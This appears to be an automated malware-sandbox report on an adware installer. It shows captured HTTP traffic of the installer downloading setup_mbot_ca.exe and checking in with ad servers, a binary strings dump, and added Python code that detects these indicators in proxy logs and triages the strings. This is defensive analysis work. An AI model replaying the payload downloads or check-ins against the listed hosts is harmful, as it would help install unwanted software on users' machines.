UeSqwGY0UOROgcFo04bH/u271KjafRZeMcqbeL54nmcnslLnwN2dkc9Lbqzizf7OSp47lEM2phEkB1OREQxx6ZID364W8TaSNDd7cm6Qz2FlEIjo VGPybLrRefWQf CUsVF
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=255559&tag=CA_AMONETIZE_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:25 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sat, 12 Mar 16 21:12:00 GMT
Set-Cookie: _c4aid=0C846B3A5BF443AFB068F8F0503164D7; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=0C846B3A5BF443AFB068F8F0503164D7,1457817145.87228; expires=Thu, 08 Sep 16 21:12:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 255559);......0..
HEAD /download/trasgo/amonetize/ca/setup_mbot_ca.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.4
Host: dl.tcoupichou.eu
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:12 GMT
Server: Apache/2.2.16
Last-Modified: Sat, 12 Mar 2016 11:37:00 GMT
ETag: "2140379-5079c7-52dd8773e0344"
Accept-Ranges: bytes
Content-Length: 5274055
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET /download/trasgo/amonetize/ca/setup_mbot_ca.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.4
Host: dl.tcoupichou.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 21:12:12 GMT
Server: Apache/2.2.16
Last-Modified: Sat, 12 Mar 2016 11:37:00 GMT
ETag: "2140379-5079c7-52dd8773e0344"
Accept-Ranges: bytes
Content-Length: 5274055
Keep-Alive: timeout=15, max=200
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................P...................................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.............@......................@..P..................................................................................................................................................................string................<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName...(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..MethodName..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..FreeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@....%..@....%..@.
<<< skipped >>>
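The capture above gives enough concrete artefacts to write network detections without guessing at signatures: the Inno download plugin fetching setup_mbot_ca.exe, the WinHttpRequest.5 User-Agent hitting get_protect.cgi and settags, the component's own mbot_ca_ User-Agent, and the set of contacted hosts. The following is an added example, not the report's own IDS output (the Suricata verdict block above is empty) and not code from the analysed software: it runs those rules over a constructed proxy log and then correlates them per client, because an Inno Setup download on its own is also what legitimate installers do. The log format and client addresses are assumptions.

```python
import urllib.parse

# Hosts contacted in the capture above (URL table and Traffic sections).
IOC_HOSTS = {
    "dl.tuto4pc.com", "dl.tcoupichou.eu", "prof.eorezo.com",
    "prof.youandmeandmeandyouhihi.com", "ads.regiedepub.com",
    "ads.under-myscreen.be", "upd.adskyforever.com",
}
WINHTTP_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
CHECKIN_PATHS = {"/cgi-bin/get_protect.cgi", "/cgi-bin/advert/settags"}

# Constructed proxy log: tab-separated "timestamp client method url status user-agent".
# Client 10.0.0.5 replays the sequence seen above; 10.0.0.7 is an unrelated Inno Setup
# installer fetching its own payload; 10.0.0.9 is ordinary browsing.
SAMPLE_LOG = """\
2016-03-12T21:12:12Z\t10.0.0.5\tHEAD\thttp://dl.tcoupichou.eu/download/trasgo/amonetize/ca/setup_mbot_ca.exe\t200\tInnoDownloadPlugin/1.4
2016-03-12T21:12:12Z\t10.0.0.5\tGET\thttp://dl.tcoupichou.eu/download/trasgo/amonetize/ca/setup_mbot_ca.exe\t200\tInnoDownloadPlugin/1.4
2016-03-12T21:12:18Z\t10.0.0.5\tGET\thttp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US\t200\tMozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
2016-03-12T21:12:23Z\t10.0.0.5\tGET\thttp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc\t200\tmbot_ca_014010265-1.10
2016-03-12T21:15:02Z\t10.0.0.7\tGET\thttps://www.example.com/update/setup.exe\t200\tInnoDownloadPlugin/1.4
2016-03-12T21:16:40Z\t10.0.0.9\tGET\thttps://www.example.org/\t200\tMozilla/5.0 (Windows NT 5.1) Firefox/44.0
"""


def parse_log(text: str) -> list:
    """Split the tab-separated log into dicts; the user-agent is the last field and
    may itself contain spaces and parentheses, hence the bounded split."""
    rows = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        ts, client, method, url, status, ua = line.split("\t", 5)
        rows.append({"line": n, "ts": ts, "client": client, "method": method,
                     "url": url, "status": int(status), "ua": ua})
    return rows


def match_rules(row: dict) -> list:
    """Rule ids that fire for one request. Each is derived from a concrete artefact in
    the capture above. 'inno-download-exe' alone is weak because legitimate Inno Setup
    installers use the same plugin, so it is only escalated when the same client also
    shows a check-in rule (see install_chains)."""
    parts = urllib.parse.urlsplit(row["url"])
    host, path, ua = (parts.hostname or "").lower(), parts.path, row["ua"]
    hits = []
    if ua.startswith("InnoDownloadPlugin/") and path.lower().endswith(".exe"):
        hits.append("inno-download-exe")
    if ua == WINHTTP_UA and path in CHECKIN_PATHS:
        hits.append("winhttp-checkin")
    if ua.startswith("mbot_"):
        hits.append("mbot-user-agent")
    if host in IOC_HOSTS:
        hits.append("ioc-host")
    return hits


def detect(text: str) -> list:
    """(line, client, rule) for every rule that fires over the log."""
    return [(r["line"], r["client"], rule) for r in parse_log(text) for rule in match_rules(r)]


def install_chains(alerts: list) -> set:
    """Clients that both downloaded an executable through the Inno plugin and produced
    an installer check-in or component user-agent: the full sequence seen above."""
    by_client = {}
    for _, client, rule in alerts:
        by_client.setdefault(client, set()).add(rule)
    return {c for c, rules in by_client.items()
            if "inno-download-exe" in rules and rules & {"winhttp-checkin", "mbot-user-agent"}}


if __name__ == "__main__":
    alerts = detect(SAMPLE_LOG)
    for line, client, rule in alerts:
        print(f"line {line}: {client} {rule}")
    print("install chains:", sorted(install_chains(alerts)))
```

The host list will age faster than the behavioural rules; the WinHttpRequest.5 User-Agent against a get_protect.cgi path and any User-Agent beginning with mbot_ are the parts worth keeping when the download domains rotate, as the two mirrors for setup_mbot_ca.exe in the URL table already show.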
Map
The SpyTool connects to the servers at the following location(s):
Strings from Dumps
upmbot_ca_014010265.exe_1092:
.text
`.rdata
@.data
.rsrc
@.reloc
RSSSSSSh
QSSh(,j
tFHt:Ht.Ht"Hu`
SSSSh
SSSShxno
u$SShe
tWSShW
tl9_ tgSSh
t'SShl
j%XtL9E
FtPW
SSh@B
u.SSh
tsSSh
FTCP
t.WWWSP
tAHt.HHt
FTPS
t.VhxPj
u)SShF
s%j.Zf
xSSSh
FTPjKS
FtPj;S
C.PjRV
LookupPrivilegeValue error: %u
?456789:;
!"#$%&'()* ,-./0123
ntdll.dll
RegSetKeySecurity error! (rc=%lu)
Key not found.
Error opening key.
%%X
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is not compiled with PCRE_UTF8 support
PCRE does not support \L, \l, \N, \U, or \u
support for \P, \p, and \X has not been compiled
(*VERB) with an argument is not supported
!"#$%&'((()* ,-./01
CNotSupportedException
CCmdTarget
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CFtpFileFind
CHttpConnection
CFtpConnection
CHttpFile
RegDeleteKeyExW
TaskDialogIndirect
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
CHotKeyCtrl
CMFCToolBarsKeyboardPropertyPage
GetProcessWindowStation
operator
portuguese-brazilian
qR.Rd
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
Error %d: Could not begin update of %s
Error %d: Updating resource
!"#$%&'()* ,-./:;?@[\]^_`{|}~
E:\wizz\EOP - OFF\EOP - OFF\Release\temp.pdb
IPHLPAPI.DLL
PSAPI.DLL
GetProcessHeap
GetWindowsDirectoryW
GetCPInfo
KERNEL32.dll
GetKeyState
SetWindowsHookExW
CreateDialogIndirectParamW
UnhookWindowsHookEx
MsgWaitForMultipleObjectsEx
GetAsyncKeyState
MapVirtualKeyW
GetKeyboardLayout
GetKeyboardState
GetKeyNameTextW
MapVirtualKeyExW
EnumChildWindows
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GDI32.dll
MSIMG32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExW
RegUnLoadKeyW
RegLoadKeyW
RegSetKeySecurity
RegEnumKeyExW
RegDeleteKeyW
RegCreateKeyExW
RegQueryInfoKeyW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
COMCTL32.dll
UrlUnescapeW
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
OLEACC.dll
HttpQueryInfoW
HttpSendRequestW
HttpOpenRequestW
InternetCrackUrlW
InternetCanonicalizeUrlW
FtpDeleteFileW
FtpRenameFileW
FtpCreateDirectoryW
FtpRemoveDirectoryW
FtpSetCurrentDirectoryW
FtpGetCurrentDirectoryW
FtpPutFileW
FtpGetFileW
HttpAddRequestHeadersW
HttpEndRequestW
HttpSendRequestExW
FtpOpenFileW
FtpCommandW
FtpFindFirstFileW
InternetOpenUrlW
WININET.dll
GdiplusShutdown
gdiplus.dll
IMM32.dll
WINMM.dll
.?AVCCmdTarget@@
.?AV?$CArray@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@ABV12@@@
.PAVCFileException@@
.PAVCInternetException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.?AVCCmdUI@@
.PAVCArchiveException@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.?AVCFtpFileFind@@
.?AVCFtpConnection@@
.?AVCHttpConnection@@
.?AVCHttpFile@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@
.?AVCToolCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCKeyboardManager@@
.PAVCOleDispatchException@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@
.?AVCMFCWindowsManagerDialog@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.?AVCMFCStatusBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCHotKeyCtrl@@
.?AVCMFCRibbonKeyTip@@
.?AVCOleCmdUI@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WHH@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCRibbonKeyboardCustomizeDialog@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
XGCCA_ggqfQQe0ggrmSSK=ggKfuuw/jjxKlleHqqv/ttGKMMB5nnf^EE3%XXN SSNASSA ddY~vvKCjjsLllvfxxu%uudcxxY,ppx=ggz$mm2o99JQggronnfVXXc.ttNXjjwsbbJLccJ~IIyIppHqIIuCXXx)LLGxttmVLLx3vvJaNNE}ttc2dd1qnn32xxyrCCp]ttAThhNWddCwkkszLLn>XXd7HH1tpp4"uu2sxxs.LLi\uupullNBccB.nnIxwwriLLt/vvJMggUZoocjxxLDll36ddW,XXpHNN8bbbHlld466sKCCrobbPpttpFjjmPttwIllxOwwpUddnrXX1TLLEGSS3wxxo*jjvaVVLfWWG/NNH$SSG`ddq`CCHR00O"CCHPHH3Auu1e33q~WW1,qqL0mmp1ll2^uuwnIInVnnrBoo5zwwdMwwVISS3ggv"XXE&CCx9llO9WWm~LLhVCCmIdd6!uuG3jjN4bbc!jjurvveXUUE/ll1R00B1llf6bbV.XXwSxxk0wwwSnncPggHO33V^kkeIxxxfnnxAggqQCCJM33Y\ppeclls CCJ&VV4foor3ll5BXXmXnnnQWWx$LL4[kkfhggI@kkmRnnnvmmwY33W CCe>RRl\QQx\qqoDggwVxxeFllN"VVzEWWw|dd3{llNXddz=ll3vnn6jkkcttB1EEBpwwK!ddRKSSxWNNWnjjzzNNzFll3hjj5\ggv/IIbOuuwillWQXXH`LLV$ttGHMMB&XXwf33d*oo24ddO8ooJC66t4jjNUFF30WWfRdddmuuHe33l`mmHs00mDxxx~xxndmmfYFFZ\jjdaggR%WW2:dd5Cnnvl66V)ppBFLL5Exx1rxxCVggvGXXoSpp2f553AXXeaRR3vWWH)nne$ggp/jjxMttx_MMVvXXNcll8MSS2)IIB{uuN4jjJEttvWNNMLuuGNNN6Pjje~33vdQQc3jjf nnJ*FFZ%SSr0FF6"ppd^VVenhhH\RRUiCCv9RRPJbb2KLLR6wwK@FFV\XX3XXX1QuuvCVV4;mmcXddBDnnehIIlGWWJ0lle:jjG.ttEKQQdYqqe(XXZ0jjw&mmr~nnOTWWe8nnN3ggf 
llxrppm.xxzgppf!NNiHkkm.ttUMttN%VVu8oodKxx4}uurZnnTWSSvDNNattw.33m#QQw,xx8hmm1,RRuWppfKeeVBuuvVnnV!SSv/VVeBSSwJLLNaooHbgg4jbbNNXXWGnneM66kibbJ)XXZ!ood`nnb@QQ24VVpojjev00yBQQdSllwGbbwWnnZ}WWdgFF6=SS4,ggmRxxB{ddLxggxAnnK=SSzVttP[lldDXXVnWWzbxx4&ppNZxxk`SSf^IIN.jjwXSSN\wwA@nnifXX2Gggh-CCe~XX5-kks%LLG/XXN,gg6lvvH9RRx6XXr2wwR:xxZ(VV5dooN(aa4qkkvgnn3Qmmcpdd8AWWd/ddOJppzrnnb3ccNjll5IuuHB66V[xx1mLLMFWWzFlljlWWw900CRjj1~eeE$ppNHXXUfoopQjjYXllpannJ-hhB0ddoajj2KddBYSSswllRNbbx2VVkfXXG#VVq{SSeAIIxmjjG_jj2]ppNYMM1,llJMjjO)ppsTlld=bb2=00A*QQckllo-oo1|HHE7nnB~bbEoWWe?66LRnnfEddz}SSH»Ajjj4ZXXEZppNyddz,llJDNNYWccJp991SggH1HH2&QQpnXX8[hhJ}llT{mmKZHH3hSSN{66hwCCBAllL4QQ1qMMJ%WWr%jju|ccGQbbZ3bbZ{dd51CCmALLt]ppG2xxfCSSx>gge9uue3nnyWvvJjgg3!uux;aaR_WWd9VVu&llmjbbHcggcdHHNtccJUHH3ebbvVMMRivvB)ddWqpp2|ggiBSSf^XXKjjV'ccZ`aaR/jjzQaaR~uuz]tt23jjmv66GcCCvxEEB%yysEggN2CCfmxxD%QQJiddISnnm7tt8`ttKZxxE4QQv@ggTIXXdS00G6bbxQ99E2uupuooEtuupLaaAvjjGYwwY\nnc6VVN.ttB5EEBvnnG-NNvKppJjLL4JppG-jj1^QQxfXXG;jj3TMMJIttG=MMB[QQrCxx6WmmG7nnphjjs4ddr]QQNuMMRXxxz;ll6AooB:eeP7uup0XXl9kkeQllExwwzZggErXXHTVVBCQQcYllr>nnH566Y`kkc;llIdCCc6VVp3xx4,nnP6wweOUUJjjY9ttc[LLk5jjGpxxYUllpZxxb_mmHsSSArQQf2dccHHEE2iCCxOggIoWWfsddV8QQN^XXt>ggfESSVhXXwQddu_nnd{qquenn2Rll4Ejje3xx3Yjj4vnniwWW4yxxvfbb4zggkTmmNvllq>nnH
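The strings dumped from upmbot_ca_014010265.exe carry the usual triage material: keyboard-state and hook imports (SetWindowsHookExW, GetAsyncKeyState, GetKeyboardState, GetKeyNameTextW), registry write and ACL APIs, a full WinINet FTP/HTTP client, ShellExecute, a LookupPrivilegeValue error string and a PDB path from the build machine. The following added example (not part of the report or of the analysed software) buckets such a dump into capabilities and pulls out the build-environment leaks. It also handles the caveat this particular dump needs: the binary statically links MFC, whose accelerator and hot-key UI classes (CHotKeyCtrl, CMFCAcceleratorKey, CKeyboardManager) import the same keyboard functions, so the keyboard-capture bucket is downgraded to low confidence rather than reported as keylogging. The input list is a constructed subset of the dump above.

```python
import re

# A subset of the strings dump above (constructed list for the example; the full dump
# is several hundred entries).
SAMPLE_STRINGS = [
    "SetWindowsHookExW", "UnhookWindowsHookEx", "GetAsyncKeyState", "GetKeyboardState",
    "GetKeyNameTextW", "MapVirtualKeyW", "MapVirtualKeyExW", "GetKeyboardLayout", "GetKeyState",
    "RegCreateKeyExW", "RegSetKeySecurity", "RegDeleteKeyW", "RegLoadKeyW", "RegUnLoadKeyW",
    "FtpPutFileW", "FtpGetFileW", "FtpOpenFileW", "FtpCommandW",
    "HttpSendRequestW", "HttpOpenRequestW", "InternetOpenUrlW", "HttpAddRequestHeadersW",
    "ShellExecuteW", "ShellExecuteExW",
    "LookupPrivilegeValue error: %u",
    "E:\\wizz\\EOP - OFF\\EOP - OFF\\Release\\temp.pdb",
    ".?AVCHotKeyCtrl@@", ".?AVCMFCAcceleratorKey@@", ".?AVCKeyboardManager@@",
    "CMFCToolBarsKeyboardPropertyPage", "Broken pipe",
]

# Capability buckets keyed by the Win32 import names that suggest them.
CAPABILITIES = {
    "keyboard-capture": {"SetWindowsHookExW", "SetWindowsHookExA", "GetAsyncKeyState",
                         "GetKeyboardState", "GetKeyNameTextW", "MapVirtualKeyW",
                         "MapVirtualKeyExW", "GetKeyboardLayout", "GetKeyState"},
    "registry-write": {"RegCreateKeyExW", "RegSetValueExW", "RegSetKeySecurity",
                       "RegDeleteKeyW", "RegLoadKeyW", "RegUnLoadKeyW"},
    "ftp-transfer": {"FtpPutFileW", "FtpGetFileW", "FtpOpenFileW", "FtpCommandW"},
    "http-client": {"HttpSendRequestW", "HttpOpenRequestW", "InternetOpenUrlW",
                    "HttpAddRequestHeadersW"},
    "process-launch": {"ShellExecuteW", "ShellExecuteExW", "CreateProcessW"},
}
PDB_RE = re.compile(r"^[A-Za-z]:\\.*\.pdb$", re.IGNORECASE)


def profile_strings(strings: list) -> dict:
    """Bucket imports into capabilities and pull out build-environment leaks.
    Keyboard APIs are marked low-confidence when MFC keyboard-UI classes are present,
    because an MFC accelerator/hot-key UI legitimately imports the same functions."""
    present = set(strings)
    caps = {tag: sorted(present & names) for tag, names in CAPABILITIES.items()}
    caps = {tag: names for tag, names in caps.items() if names}
    mfc_keyboard_ui = any(s.startswith(".?AVCMFC") or s.startswith("CMFC") or "CHotKeyCtrl" in s
                          for s in strings)
    confidence = {tag: "high" for tag in caps}
    if "keyboard-capture" in caps and mfc_keyboard_ui:
        confidence["keyboard-capture"] = "low (MFC keyboard UI present)"
    return {
        "capabilities": caps,
        "confidence": confidence,
        "pdb_paths": [s for s in strings if PDB_RE.search(s)],
        "privilege_strings": [s for s in strings if "Privilege" in s],
    }


if __name__ == "__main__":
    p = profile_strings(SAMPLE_STRINGS)
    for tag, names in p["capabilities"].items():
        print(f"{tag:<17} {p['confidence'][tag]:<30} {', '.join(names)}")
    print("pdb:", p["pdb_paths"], "privilege:", p["privilege_strings"])
```

Feed it the output of `strings -e l` and `strings` over the dump (or this page's list) and treat a low-confidence keyboard bucket as a prompt to look for a WH_KEYBOARD_LL hook at runtime rather than as a verdict; the FTP client and PDB path are the findings that survive the MFC caveat.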